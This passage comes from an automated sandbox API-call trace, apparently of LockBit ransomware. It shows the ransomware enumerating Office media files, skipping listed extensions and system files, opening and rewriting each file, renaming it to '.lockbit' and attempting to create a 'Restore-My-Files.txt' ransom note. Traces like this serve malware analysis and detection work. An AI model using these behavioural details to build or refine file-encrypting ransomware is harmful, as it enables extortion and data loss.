Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.981] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.981] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.983] free (_Block=0x1fa2ed8) [0200.983] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.983] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.983] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d10e600, ftCreationTime.dwHighDateTime=0x1bdcf23, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4d10e600, ftLastWriteTime.dwHighDateTime=0x1bdcf23, nFileSizeHigh=0x0, nFileSizeLow=0x7b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18226_.WMF", cAlternateFileName="")) returned 1 [0200.983] lstrcmpiW (lpString1=".", lpString2="BD18226_.WMF") returned -1 [0200.983] lstrcmpiW (lpString1="..", lpString2="BD18226_.WMF") returned -1 [0200.983] PathFindExtensionW (pszPath="BD18226_.WMF") returned=".WMF" [0200.983] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.983] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.984] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.985] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.985] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18226_.WMF") returned 1 [0200.986] lstrcmpiW (lpString1="ntldr", lpString2="BD18226_.WMF") returned 1 [0200.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18226_.WMF") returned 1 [0200.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18226_.WMF") returned 1 [0200.986] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18226_.WMF") returned -1 [0200.986] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18226_.WMF") returned 1 [0200.986] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18226_.WMF") returned 1 [0200.986] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.986] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF") returned=".WMF" [0200.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.986] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.987] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.987] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF.lockbit") returned 79 [0200.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18226_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0200.989] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.989] malloc (_Size=0x40068) returned 0x3e70008 [0200.990] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1972) returned 1 [0200.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0200.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0200.991] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0200.996] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.996] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.996] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.998] free (_Block=0x1fa2ed8) [0200.998] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.998] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.998] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e4fd00, ftCreationTime.dwHighDateTime=0x1bdcf1f, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x83e4fd00, ftLastWriteTime.dwHighDateTime=0x1bdcf1f, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18227_.WMF", cAlternateFileName="")) returned 1 [0200.998] lstrcmpiW (lpString1=".", lpString2="BD18227_.WMF") returned -1 [0200.998] lstrcmpiW (lpString1="..", lpString2="BD18227_.WMF") returned -1 [0200.998] PathFindExtensionW (pszPath="BD18227_.WMF") returned=".WMF" [0200.998] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.998] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.998] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.998] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.998] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.998] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.999] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.000] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.000] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18227_.WMF") returned 1 [0201.001] lstrcmpiW (lpString1="ntldr", lpString2="BD18227_.WMF") returned 1 [0201.001] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18227_.WMF") returned 1 [0201.001] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18227_.WMF") returned 1 [0201.001] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18227_.WMF") returned -1 [0201.001] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18227_.WMF") returned 1 [0201.001] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18227_.WMF") returned 1 [0201.001] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.001] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF") returned=".WMF" [0201.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.001] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.001] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.002] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.003] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.003] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.003] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF.lockbit") returned 79 [0201.003] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18227_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0201.004] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.005] malloc (_Size=0x40068) returned 0x1ff1e60 [0201.005] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3564) returned 1 [0201.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0201.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0201.006] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0201.030] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.030] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.030] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.030] free (_Block=0x1fa2ed8) [0201.030] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.030] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.030] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.030] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb337000, ftCreationTime.dwHighDateTime=0x1bdcf22, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb337000, ftLastWriteTime.dwHighDateTime=0x1bdcf22, nFileSizeHigh=0x0, nFileSizeLow=0x884, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18228_.WMF", cAlternateFileName="")) returned 1 [0201.030] lstrcmpiW (lpString1=".", lpString2="BD18228_.WMF") returned -1 [0201.030] lstrcmpiW (lpString1="..", lpString2="BD18228_.WMF") returned -1 [0201.030] PathFindExtensionW (pszPath="BD18228_.WMF") returned=".WMF" [0201.030] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.030] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.030] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.031] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.031] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18228_.WMF") returned 1 [0201.032] lstrcmpiW (lpString1="ntldr", lpString2="BD18228_.WMF") returned 1 [0201.032] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18228_.WMF") returned 1 [0201.032] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18228_.WMF") returned 1 [0201.032] 